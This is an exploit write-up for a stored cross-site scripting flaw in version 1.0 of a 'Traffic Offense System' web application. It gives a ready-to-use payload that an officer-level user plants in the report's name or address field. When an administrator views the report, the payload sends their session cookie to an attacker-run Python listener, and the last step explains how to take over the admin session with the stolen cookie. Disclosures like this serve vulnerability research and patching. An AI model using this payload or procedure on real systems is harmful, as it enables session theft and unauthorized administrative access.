# Exploit Title: Traffic Offense System | Stored Cross Site Scripting (Cookie-theft)  
# Exploit Author: Richard Jones  
# Date: 03-04-2021  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
Stored XSS by adding a offense report.  
1. Using an officer account, login to the application.  
2. Start a python server (python3 -m http.server 8090)  
3. Goto Report Offense, make a report, add payload below in the name or address field  
"><img src=x onerror="this.src='http://YOUR-IP:8090/?'+document.cookie; this.removeAttribute('onerror');">  
4. Wait for the admin to login.   
5. Cookies will show in the python server  
6. Get admin access here: http://TARGET/trafic/index.php , open dev tools (f12), add cookie to session and refresh page to be logged in as admin.